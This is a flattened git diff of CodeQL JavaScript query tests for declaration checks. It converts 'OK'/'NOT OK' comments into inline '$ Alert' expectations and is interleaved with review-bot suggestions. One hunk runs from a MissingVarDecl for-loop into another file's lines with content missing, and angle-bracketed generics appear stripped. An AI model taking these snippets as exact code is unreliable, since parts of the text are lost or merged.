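Review bot: In DeclBeforeUse/jslint.js the use of `y` was commented `// not OK` and is now left with no annotation, while only `z` keeps `// $ Alert`. With the inline-expectations postprocess added to the .qlref, the bare line presumably reads as "no alert expected here". That agrees with the file's own remark that `/* global y*/` is accepted as a declaration, but the hunk does not show whether the old comment was stale or the expected result changed. I would state the intent on the line, `y; // OK - accepted via the lenient '/* global y*/' comment above`, so the dropped expectation does not look like an oversight.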
--- a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/typescript.ts +++ b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/typescript.ts @@ -1,7 +1,7 @@ -@Component(Foo) // OK +@Component(Foo) class Foo {} -declare class Bar extends Baz {} // OK +declare class Bar extends Baz {} declare class Baz {} export type { I }; // OK - does not refer to the constant 'I' diff --git a/javascript/ql/test/query-tests/Declarations/DefaultArgumentReferencesNestedFunction/DefaultArgumentReferencesNestedFunction.qlref b/javascript/ql/test/query-tests/Declarations/DefaultArgumentReferencesNestedFunction/DefaultArgumentReferencesNestedFunction.qlref index da8c0e499f5f..25a417d4cc8c 100644 --- a/javascript/ql/test/query-tests/Declarations/DefaultArgumentReferencesNestedFunction/DefaultArgumentReferencesNestedFunction.qlref +++ b/javascript/ql/test/query-tests/Declarations/DefaultArgumentReferencesNestedFunction/DefaultArgumentReferencesNestedFunction.qlref @@ -1 +1,2 @@ -Declarations/DefaultArgumentReferencesNestedFunction.ql \ No newline at end of file +query: Declarations/DefaultArgumentReferencesNestedFunction.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/DefaultArgumentReferencesNestedFunction/tst.js b/javascript/ql/test/query-tests/Declarations/DefaultArgumentReferencesNestedFunction/tst.js index 4696ab7b54c3..652af0051b51 100644 --- a/javascript/ql/test/query-tests/Declarations/DefaultArgumentReferencesNestedFunction/tst.js +++ b/javascript/ql/test/query-tests/Declarations/DefaultArgumentReferencesNestedFunction/tst.js @@ -1,4 +1,4 @@ -function f(x, y = defaultVal(x)) { +function f(x, y = defaultVal(x)) { // $ Alert function defaultVal(x) { return x+19; } diff --git a/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.expected b/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.expected index 60d8f7f619e3..26ac43a1dfa2 100644 
--- a/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.expected +++ b/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.expected @@ -1 +1 @@ -| tst.js:2:11:2:16 | a = 42 | Variable a has already $@. | tst.js:2:5:2:5 | a | been previously declared | +| tst.js:1:11:1:16 | a = 42 | Variable a has already $@. | tst.js:1:5:1:5 | a | been previously declared | diff --git a/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.qlref b/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.qlref index f3b921510036..464ae67871c4 100644 --- a/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.qlref +++ b/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.qlref @@ -1 +1,2 @@ -Declarations/DuplicateVarDecl.ql \ No newline at end of file +query: Declarations/DuplicateVarDecl.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/tst.js b/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/tst.js index 5014f7d5dbf3..0b5ef32b81a7 100644 --- a/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/tst.js +++ b/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/tst.js @@ -1,7 +1,6 @@ -// NOT OK -var a, b, a = 42; +var a, b, a = 42; // $ Alert + -// OK var x; var y; var x; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/IneffectiveParameterType.qlref b/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/IneffectiveParameterType.qlref index 6c8915bdd08c..33e0ddb6ffe1 100644 --- a/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/IneffectiveParameterType.qlref +++ b/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/IneffectiveParameterType.qlref 
@@ -1 +1,2 @@ -Declarations/IneffectiveParameterType.ql +query: Declarations/IneffectiveParameterType.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.js b/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.js index 8ace9c1472ab..96cb2578e3d2 100644 --- a/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.js +++ b/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.js @@ -1 +1 @@ -function getStuff(number) {} // OK: don't report anything related type annotations in .js files +function getStuff(number) {} // OK - don't report anything related type annotations in .js files diff --git a/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.ts b/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.ts index 5aadd17c4d58..a9713de9685e 100644 --- a/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.ts +++ b/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.ts 
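Review bot: The rewritten comment in IneffectiveParameterType/tst.js carries over the missing word from the old one: `// OK - don't report anything related type annotations in .js files`. Since the line is being touched anyway, `// OK - don't report anything related to type annotations in .js files` reads correctly.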
@@ -1,36 +1,36 @@ import { MyType, x } from 'somewhere'; -function join(items: T[], callback: (T) => string) { // NOT OK: (T) should be (x:T) +function join(items: T[], callback: (T) => string) { // $ Alert - (T) should be (x:T) return items.map(callback).join(", ") } -var box : (T) => T[] = (x) => [x]; // NOT OK: (T) should be (x:T) +var box : (T) => T[] = (x) => [x]; // $ Alert - (T) should be (x:T) interface EventEmitter { - addListener(listener: (T) => void): void; // NOT OK: (T) should be (x:T) - forwardFrom(other: EventEmitter, converter: (S) => T); // NOT OK: (S) should be (x:S) + addListener(listener: (T) => void): void; // $ Alert - (T) should be (x:T) + forwardFrom(other: EventEmitter, converter: (S) => T); // $ Alert - (S) should be (x:S) } interface NumberFormatter { - format(number): string; // NOT OK: (number) should be (x:number) - (number): string; // NOT OK: (number) should be (x:number) + format(number): string; // $ Alert - (number) should be (x:number) + (number): string; // $ Alert - (number) should be (x:number) } -type TextFormatter = (NumberFormatter) => string; // NOT OK: (NumberFormatter) should be (x:NumberFormatter) +type TextFormatter = (NumberFormatter) => string; // $ Alert - (NumberFormatter) should be (x:NumberFormatter) var myGlobal : MyType; -var myCallback: (MyType) => void; // NOT OK: (MyType) should be (x:MyType) +var myCallback: (MyType) => void; // $ Alert - (MyType) should be (x:MyType) -var myOtherCallback : (x) => void; // OK: nothing indicates that 'x' is a type name. +var myOtherCallback : (x) => void; // OK - nothing indicates that 'x' is a type name. 
interface Repeated { x: number; } interface Repeated { y: number; } interface Repeated { z: number; } -type Callback = (Repeated) => void; // NOT OK: but should only be reported once +type Callback = (Repeated) => void; // $ Alert - but should only be reported once class C { - getName(string) { // OK: parameter name is not part of signature + getName(string) { // OK - parameter name is not part of signature return null; } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.expected b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.expected index c9bd449006f4..60a075561957 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.expected +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.expected 
@@ -1,10 +1,10 @@ | abstract-missing.ts:3:5:3:24 | setAudioProperties() | This call refers to a global function, and not the local method $@. | abstract-missing.ts:6:3:6:32 | abstrac ... ties(); | setAudioProperties | -| indirection.js:7:9:7:20 | m("default") | This call refers to a global function, and not the local method $@. | indirection.js:2:5:4:5 | m() {\\n ... K\\n } | m | +| indirection.js:7:9:7:20 | m("default") | This call refers to a global function, and not the local method $@. | indirection.js:2:5:4:5 | m() {\\n ... ;\\n } | m | | missing1.js:3:5:3:24 | setAudioProperties() | This call refers to a global function, and not the local method $@. | missing1.js:6:3:7:3 | setAudi ... (){\\n } | setAudioProperties | | missing2.js:3:5:3:24 | setAudioProperties() | This call refers to a global function, and not the local method $@. | missing2.js:7:3:8:3 | static ... (){\\n } | setAudioProperties | -| namespaces-uses.ts:3:5:3:20 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:2:3:4:3 | globalF ... OK\\n } | globalFunction | -| namespaces-uses.ts:6:5:6:26 | topName ... ction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:5:3:7:3 | topName ... OK\\n } | topNamespaceFunction | -| namespaces-uses.ts:9:5:9:28 | childNa ... ction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:8:3:10:3 | childNa ... OK\\n } | childNamespaceFunction | -| namespaces-uses.ts:16:7:16:22 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:15:5:17:5 | globalF ... K\\n } | globalFunction | -| namespaces-uses.ts:30:7:30:22 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:29:5:31:5 | globalF ... 
K\\n } | globalFunction | +| namespaces-uses.ts:3:5:3:20 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:2:3:4:3 | globalF ... ert\\n } | globalFunction | +| namespaces-uses.ts:6:5:6:26 | topName ... ction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:5:3:7:3 | topName ... ert\\n } | topNamespaceFunction | +| namespaces-uses.ts:9:5:9:28 | childNa ... ction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:8:3:10:3 | childNa ... ert\\n } | childNamespaceFunction | +| namespaces-uses.ts:16:7:16:22 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:15:5:17:5 | globalF ... t\\n } | globalFunction | +| namespaces-uses.ts:30:7:30:22 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:29:5:31:5 | globalF ... t\\n } | globalFunction | | not-ignored-by-jslint.js:4:5:4:24 | setAudioProperties() | This call refers to a global function, and not the local method $@. | not-ignored-by-jslint.js:7:3:8:3 | setAudi ... (){\\n } | setAudioProperties | diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.qlref b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.qlref index 0dc32a588efb..510e68bd8977 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.qlref +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.qlref @@ -1 +1,2 @@ -Declarations/MissingThisQualifier.ql \ No newline at end of file +query: Declarations/MissingThisQualifier.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/abstract-missing.ts b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/abstract-missing.ts index dedc0b8c9601..a81bfd9a96d4 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/abstract-missing.ts +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/abstract-missing.ts @@ -1,6 +1,6 @@ abstract class Audio3D { setAudioStream() { - setAudioProperties(); // NOT OK + setAudioProperties(); // $ Alert } abstract setAudioProperties(); diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-externs.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-externs.js index 78e0637b1b31..7af69ca17e4d 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-externs.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-externs.js @@ -1,6 +1,6 @@ class Audio3D { setAudioStream() { - externs_setAudioProperties(); // OK + externs_setAudioProperties(); } externs_setAudioProperties(){ diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-jslint.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-jslint.js index c8d8436ab5fe..24894c816cb1 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-jslint.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-jslint.js @@ -1,7 +1,7 @@ /*global setAudioProperties*/ class Audio3D { setAudioStream() { - setAudioProperties(); // OK + setAudioProperties(); } setAudioProperties(){ diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/indirection.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/indirection.js index 086a8ba03c28..c55f8d03ae34 100644 
--- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/indirection.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/indirection.js @@ -1,9 +1,9 @@ class X { m() { - m("default"); // OK + m("default"); } resty(...x) { - m("default"); // NOT OK + m("default"); // $ Alert } } diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing1.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing1.js index b7810e851eef..967d2ddf165b 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing1.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing1.js @@ -1,6 +1,6 @@ class Audio3D { setAudioStream() { - setAudioProperties(); // NOT OK + setAudioProperties(); // $ Alert } setAudioProperties(){ diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing2.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing2.js index f0fa436f80b0..a7e9c39ae849 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing2.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing2.js @@ -1,6 +1,6 @@ class Audio3D { static setAudioStream() { - setAudioProperties(); // NOT OK + setAudioProperties(); // $ Alert } diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/namespaces-uses.ts b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/namespaces-uses.ts index 96d83d9f12ac..2000aa1b4b72 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/namespaces-uses.ts +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/namespaces-uses.ts 
@@ -1,39 +1,39 @@ class GlobalClass { - globalFunction(){ - globalFunction(); // NOT OK + globalFunction() { + globalFunction(); // $ Alert } - topNamespaceFunction(){ - topNamespaceFunction(); // NOT OK + topNamespaceFunction() { + topNamespaceFunction(); // $ Alert } - childNamespaceFunction(){ - childNamespaceFunction(); // NOT OK + childNamespaceFunction() { + childNamespaceFunction(); // $ Alert } } namespace Top { class TopClass { - globalFunction(){ - globalFunction(); // NOT OK + globalFunction() { + globalFunction(); // $ Alert } - topNamespaceFunction(){ - topNamespaceFunction(); // OK + topNamespaceFunction() { + topNamespaceFunction(); } - childNamespaceFunction(){ - childNamespaceFunction(); // NOT OK, but not flagged since the namespace resolution is ignored + childNamespaceFunction() { + childNamespaceFunction(); // $ MISSING: Alert - not flagged since the namespace resolution is ignored } } } namespace Top.Child { class ChildClass { - globalFunction(){ - globalFunction(); // NOT OK + globalFunction() { + globalFunction(); // $ Alert } - topNamespaceFunction(){ - topNamespaceFunction(); // OK + topNamespaceFunction() { + topNamespaceFunction(); } - childNamespaceFunction(){ - childNamespaceFunction(); // OK + childNamespaceFunction() { + childNamespaceFunction(); } } -} \ No newline at end of file +} diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/non-global.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/non-global.js index e69101b80fd7..00fd5f8f67c4 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/non-global.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/non-global.js @@ -2,7 +2,7 @@ function setAudioProperties(){} class Audio3D { setAudioStream() { - setAudioProperties(); // OK + setAudioProperties(); } 
diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/not-ignored-by-jslint.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/not-ignored-by-jslint.js index 4920a96353fe..0d80afa72a8d 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/not-ignored-by-jslint.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/not-ignored-by-jslint.js @@ -1,7 +1,7 @@ /*global NOT_setAudioProperties*/ class Audio3D { setAudioStream() { - setAudioProperties(); // NOT OK + setAudioProperties(); // $ Alert } setAudioProperties(){ diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present1.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present1.js index e5cd1e1c3b41..559d4f3d75f8 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present1.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present1.js @@ -1,6 +1,6 @@ class Audio3D { setAudioStream() { - this.setAudioProperties(); // OK + this.setAudioProperties(); } diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present2.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present2.js index a55bb69e5965..396266bb6c72 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present2.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present2.js @@ -1,6 +1,6 @@ class Audio3D { static setAudioStream() { - this.setAudioProperties(); // OK + this.setAudioProperties(); } diff --git a/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.expected b/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.expected index f9a35141d67d..a679cb095a7c 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.expected +++ b/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.expected 
@@ -1,9 +1,9 @@ -| test.js:6:7:6:7 | i | Variable i is used like a local variable, but is missing a declaration. | -| test.js:14:7:14:7 | i | Variable i is used like a local variable, but is missing a declaration. | -| test.js:23:2:23:2 | y | Variable y is used like a local variable, but is missing a declaration. | -| test.js:54:10:54:10 | z | Variable z is used like a local variable, but is missing a declaration. | -| test.js:60:6:60:6 | y | Variable y is used like a local variable, but is missing a declaration. | -| test.js:66:2:66:2 | z | Variable z is used like a local variable, but is missing a declaration. | -| test.js:72:9:72:20 | unresolvable | Variable unresolvable is used like a local variable, but is missing a declaration. | +| test.js:5:7:5:7 | i | Variable i is used like a local variable, but is missing a declaration. | +| test.js:12:7:12:7 | i | Variable i is used like a local variable, but is missing a declaration. | +| test.js:20:2:20:2 | y | Variable y is used like a local variable, but is missing a declaration. | +| test.js:50:10:50:10 | z | Variable z is used like a local variable, but is missing a declaration. | +| test.js:55:6:55:6 | y | Variable y is used like a local variable, but is missing a declaration. | +| test.js:60:2:60:2 | z | Variable z is used like a local variable, but is missing a declaration. | +| test.js:66:9:66:20 | unresolvable | Variable unresolvable is used like a local variable, but is missing a declaration. | | tst3.js:7:10:7:10 | x | Variable x is used like a local variable, but is missing a declaration. | | tst3.js:7:16:7:19 | rest | Variable rest is used like a local variable, but is missing a declaration. | diff --git a/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.qlref b/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.qlref index 47259d4307ed..05c15790bd10 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.qlref 
+++ b/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.qlref @@ -1 +1,2 @@ -Declarations/MissingVarDecl.ql \ No newline at end of file +query: Declarations/MissingVarDecl.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/MissingVarDecl/test.js b/javascript/ql/test/query-tests/Declarations/MissingVarDecl/test.js index 5c4444111759..77c37017ec3a 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingVarDecl/test.js +++ b/javascript/ql/test/query-tests/Declarations/MissingVarDecl/test.js @@ -2,26 +2,23 @@ var x; function f(a) { var sum = 0; - // NOT OK - for (i=0; i void; // OK! This is a property, not a method, we ignore those. - constructor(): string; // NOT OK! This a called "constructor" - new(): Date; // OK! This a constructor signature. + function (): number; // OK - Highly unlikely that it is an accident when there are other named methods in the interface. + (): number; // OK - What was probably meant above. + new:() => void; // OK - This is a property, not a method, we ignore those. + constructor(): string; // $ Alert - This a called "constructor" + new(): Date; // OK - This a constructor signature. myNumber: 123; } @@ -13,15 +13,15 @@ interface MyInterface { var a : MyFunction = null as any; interface MyFunction { - function(): number; // NOT OK! + function(): number; // $ Alert } class Foo { - new(): number { // OK! Highly unlikely that a developer confuses "constructor" and "new" when both are present. + new(): number { // OK - Highly unlikely that a developer confuses "constructor" and "new" when both are present. return 123; } - constructor() { // OK! This is a constructor. + constructor() { // OK - This is a constructor. } myString = "foobar" 
@@ -34,18 +34,18 @@ class Foo { var b : FunctionClass = new FunctionClass(); declare class FunctionClass { - function(): number; // NOT OK: + function(): number; // $ Alert } class Baz { - new(): Baz { // OK! When there is a method body I assume the developer knows what they are doing. + new(): Baz { // OK - When there is a method body I assume the developer knows what they are doing. return null as any; } } declare class Quz { - new(): Quz; // NOT OK! The developer likely meant to write constructor. + new(): Quz; // $ Alert - The developer likely meant to write constructor. } var bla = new Foo(); diff --git a/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.expected b/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.expected index 84d7d3d40fc9..3717fc460cea 100644 --- a/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.expected +++ b/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.expected @@ -1 +1 @@ -| tst.js:3:5:3:5 | s | This expression refers to $@ inside its temporal dead zone. | tst.js:4:5:4:17 | let s = "hi"; | s | +| tst.js:2:5:2:5 | s | This expression refers to $@ inside its temporal dead zone. | tst.js:3:5:3:17 | let s = "hi"; | s | diff --git a/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.qlref b/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.qlref index 11d29c61b707..260ac43bc943 100644 --- a/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.qlref +++ b/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.qlref @@ -1 +1,2 @@ -Declarations/TemporalDeadZone.ql \ No newline at end of file +query: Declarations/TemporalDeadZone.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/tst.js b/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/tst.js index cb665103c1da..2ee068482544 100644 --- a/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/tst.js +++ b/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/tst.js @@ -1,27 +1,26 @@ function f() { - // NOT OK - s = null; + s = null; // $ Alert let s = "hi"; - // OK + s = "hello"; } function g() { - // OK + s = null; var s = "hi"; - // OK + s = "hello"; } function do_something() { - // OK + let foo; let foo; } function do_something() { - // OK + let foo; foo = "bar"; let foo; @@ -29,7 +28,7 @@ function do_something() { if (true) { // enter new scope, TDZ starts const func = function () { - console.log(myVar); // OK! + console.log(myVar); }; function otherfunc() { diff --git a/javascript/ql/test/query-tests/Declarations/TooManyParameters/TooManyParameters.expected b/javascript/ql/test/query-tests/Declarations/TooManyParameters/TooManyParameters.expected index 6ecb8a664d32..8568ca6705d1 100644 --- a/javascript/ql/test/query-tests/Declarations/TooManyParameters/TooManyParameters.expected +++ b/javascript/ql/test/query-tests/Declarations/TooManyParameters/TooManyParameters.expected @@ -1 +1 @@ -| excessiveParameterList.js:4:1:4:48 | functio ... p8) {\\n} | Function func2 has too many parameters (8). | +| excessiveParameterList.js:4:1:4:59 | functio ... Alert\\n} | Function func2 has too many parameters (8). | diff --git a/javascript/ql/test/query-tests/Declarations/TooManyParameters/TooManyParameters.qlref b/javascript/ql/test/query-tests/Declarations/TooManyParameters/TooManyParameters.qlref index 7f245bdda92e..00dcfc5b70a1 100644 --- a/javascript/ql/test/query-tests/Declarations/TooManyParameters/TooManyParameters.qlref +++ b/javascript/ql/test/query-tests/Declarations/TooManyParameters/TooManyParameters.qlref 
@@ -1 +1,2 @@ -Declarations/TooManyParameters.ql +query: Declarations/TooManyParameters.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/TooManyParameters/excessiveParameterList.js b/javascript/ql/test/query-tests/Declarations/TooManyParameters/excessiveParameterList.js index 2ff015e35bb7..52a4302d3196 100644 --- a/javascript/ql/test/query-tests/Declarations/TooManyParameters/excessiveParameterList.js +++ b/javascript/ql/test/query-tests/Declarations/TooManyParameters/excessiveParameterList.js @@ -1,5 +1,5 @@ function func1() { } -function func2(p1, p2, p3, p4, p5, p6, p7, p8) { +function func2(p1, p2, p3, p4, p5, p6, p7, p8) { // $ Alert } diff --git a/javascript/ql/test/query-tests/Declarations/TooManyParameters/externs.js b/javascript/ql/test/query-tests/Declarations/TooManyParameters/externs.js index 4327b4885f59..6881d51be716 100644 --- a/javascript/ql/test/query-tests/Declarations/TooManyParameters/externs.js +++ b/javascript/ql/test/query-tests/Declarations/TooManyParameters/externs.js @@ -1,4 +1,4 @@ -// OK: overly long parameter lists in external APIs aren't the fault of the externs definitions +// OK - overly long parameter lists in external APIs aren't the fault of the externs definitions function f(a, b, c, d, e, f, g, h) {} /** @externs */ \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/UniqueParameterNames.qlref b/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/UniqueParameterNames.qlref index a6cbbd4df634..f78c9c3afc28 100644 --- a/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/UniqueParameterNames.qlref +++ b/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/UniqueParameterNames.qlref @@ -1 +1,2 @@ -Declarations/UniqueParameterNames.ql +query: Declarations/UniqueParameterNames.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/tst.js b/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/tst.js index 1779be95e365..1e814fe219df 100644 --- a/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/tst.js +++ b/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/tst.js @@ -1,21 +1,21 @@ function f( -x, -x, // NOT OK -\u0078 // NOT OK +x, // $ Alert +x, // $ Alert +\u0078 ) { return; } this.addPropertyListener(prop.name, function(_, _, _, a) { proxy.delegate = a.dao; }); -// OK: for strict mode functions, duplicate parameter names are a syntax error +// OK - for strict mode functions, duplicate parameter names are a syntax error function f(x, y, x) { 'use strict'; } function f( x, -x // OK: empty function +x // OK - empty function ) { } -(a, a) => a + a; // OK: for strict mode functions, duplicate parameter names are a syntax error +(a, a) => a + a; // OK - for strict mode functions, duplicate parameter names are a syntax error diff --git a/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/UniquePropertyNames.qlref b/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/UniquePropertyNames.qlref index 092a0534a249..770e337950c9 100644 --- a/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/UniquePropertyNames.qlref +++ b/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/UniquePropertyNames.qlref @@ -1 +1,2 @@ -Declarations/UniquePropertyNames.ql +query: Declarations/UniquePropertyNames.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst.js b/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst.js index a8a5fe4bb7b9..fe6c4a97b13b 100644 --- a/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst.js +++ b/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst.js 
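Review bot: In the first `function f(` of `UniqueParameterNames/tst.js`, the `\u0078` line is now left without any comment, so nothing says that it is an escaped spelling of `x` and therefore one of the duplicates under test. The markers also moved from the second and third parameters to the first and second, which presumably tracks where the query reports, but the hunk gives no hint of that. A plain trailing comment would keep the intent, in the same way as the `// OK - ...` comments retained further down: `\u0078 // same name as 'x', written with a Unicode escape`.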
@@ -17,9 +17,9 @@ var accessors = { }; var clobbering = { - x: 23, // NOT OK: clobbered by `x: 56` - y: "hello", // NOT OK: clobbered by `"y": "world"` - x: 42, // NOT OK: clobbered by `x: 56` + x: 23, // $ Alert - clobbered by `x: 56` + y: "hello", // $ Alert - clobbered by `"y": "world"` + x: 42, // $ Alert - clobbered by `x: 56` x: 56, "y": "world" } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst2.js b/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst2.js index 6332a235e21e..731b0525c7b8 100644 --- a/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst2.js +++ b/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst2.js @@ -7,7 +7,7 @@ var o = { setX: function(x) { this.x = x; - }, + }, // $ Alert getX: function() { return this.x; diff --git a/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/UnreachableMethodOverloads.qlref b/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/UnreachableMethodOverloads.qlref index 37aba2753b2b..b419a3298903 100644 --- 